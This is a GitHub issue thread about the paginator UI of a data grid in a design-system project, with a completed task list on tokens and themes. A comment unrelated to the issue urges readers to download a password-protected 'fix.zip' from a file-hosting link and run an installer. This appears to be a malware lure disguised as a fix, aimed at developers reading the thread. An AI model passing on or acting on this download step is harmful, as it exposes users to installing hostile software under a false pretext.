### ISSUE TITLE
[Data Grid] UI of the Paginator

### ISSUE THREAD

**Issue by anna-lach** [sl-design-system/components#1485]
```[tasklist]
### Tasks
- [x] discuss and document requirements see #1383
- [x] Apply the tokens (It's use the tokens from the toggle button and some news. Not use the new contextual tokens)
- [x] Prepare sheets to copy in all themes
- [x] Copy to all themes
```

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
